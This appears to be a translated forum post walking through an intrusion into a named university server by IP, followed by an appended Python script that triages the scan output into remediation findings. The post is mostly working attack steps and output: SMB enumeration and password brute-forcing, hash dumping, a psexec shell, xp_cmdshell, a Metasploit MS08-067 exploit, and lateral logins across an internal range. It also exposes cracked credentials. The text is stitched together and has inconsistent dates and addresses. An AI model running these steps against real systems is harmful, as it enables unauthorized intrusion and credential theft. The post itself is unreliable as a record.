nmap + msf intrusion of Guangxi Normal

Posted on 2012-12-4 12:46:42
Guangxi Normal website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// look at the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// get user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use the ms08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal range

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
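The write-up above leaves the reader with raw nmap output and no statement of what each finding means for the host owner. The following Python script is an added example, not part of the original post and not an nmap or Metasploit component: it parses "Host script results" blocks in the format the smb-* scripts print above and turns them into prioritised findings, each paired with the fix that closes it (anonymous IPC$ access, blank or guessable SMB passwords, LM hashes still stored, the missing MS08-067 update). The sample input is constructed to mirror the post's output; the severity labels and remediation wording are the example's own choices, not nmap's.

```python
import re
from dataclasses import dataclass

# Constructed sample input: "Host script results" blocks in the format the
# post's nmap smb-* runs print (values mirror the post's output, trimmed).
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}
BLANK = "NO PASSWORD"  # marker pwdump prints for an empty LM or NT hash


@dataclass(frozen=True)
class Finding:
    severity: str  # critical / high / medium (this example's own scale)
    source: str    # nmap script whose output produced the evidence
    detail: str    # what was observed
    fix: str       # remediation the host owner should apply


def parse_host_scripts(text):
    """Group NSE output lines by script name: {script: [lines]}."""
    scripts, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue  # port table, banners etc. are not script output
        body = raw.lstrip("|_ ").rstrip()
        header = re.match(r"^(smb[\w-]*):\s*$", body)  # "| smb-brute:" opens a section
        if header:
            current = header.group(1)
            scripts[current] = []
        elif current and body:
            scripts[current].append(body)
    return scripts


def assess(scripts):
    """Turn parsed script output into findings sorted by severity."""
    findings = []

    share = None  # smb-enum-shares prints the share name, then its access line
    for line in scripts.get("smb-enum-shares", []):
        if ":" not in line:
            share = line
            continue
        key, _, value = line.partition(":")
        if key.strip() == "Anonymous access" and value.strip() != "<none>":
            findings.append(Finding("high", "smb-enum-shares",
                f"{share} allows anonymous {value.strip()} access",
                "Disable null sessions (RestrictAnonymous) and limit 445/tcp exposure"))

    for line in scripts.get("smb-brute", []):
        m = re.match(r"^([^:]+):(\S+) => Login was successful$", line)
        if m:
            user, password = m.groups()
            severity = "critical" if password == "<blank>" or user.lower() == "administrator" else "high"
            findings.append(Finding(severity, "smb-brute",
                f"{user} authenticates with a guessable password",
                "Set a strong unique password and enable an account lockout policy"))

    for line in scripts.get("smb-pwdump", []):
        m = re.match(r"^([^:]+):(\d+) => ([^:]+):(.+)$", line)
        if not m:
            continue
        user, _rid, lm_hash, nt_hash = m.groups()
        if nt_hash.startswith(BLANK):
            findings.append(Finding("critical", "smb-pwdump",
                f"{user} has an empty password", "Set a password; disable the account if unused"))
        elif not lm_hash.startswith(BLANK):
            findings.append(Finding("medium", "smb-pwdump",
                f"{user} password is also stored as a crackable LM hash",
                "Enable NoLMHash and rotate the password so only the NT hash remains"))

    for line in scripts.get("smb-check-vulns", []):
        m = re.match(r"^(MS\d{2}-\d{3}):\s*VULNERABLE", line)
        if m:
            findings.append(Finding("critical", "smb-check-vulns",
                f"{m.group(1)} patch missing",
                f"Install the {m.group(1)} update; until then block 445/tcp at the perimeter"))

    return sorted(findings, key=lambda f: SEVERITY_ORDER[f.severity])


def triage(text):
    """Raw nmap output -> findings sorted by severity."""
    return assess(parse_host_scripts(text))


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{f.severity:8}] {f.source:16} {f.detail} -> {f.fix}")
```

Run against the post's scans, the script reports three critical items (the blank Administrator password, which both smb-brute and smb-pwdump expose, and the unpatched MS08-067), then the anonymous IPC$ read and the guessable test password, then the LM-hash storage issue. Any one of the critical items alone explains the outcome of the write-up.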

5 U, t/ X7 x5 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表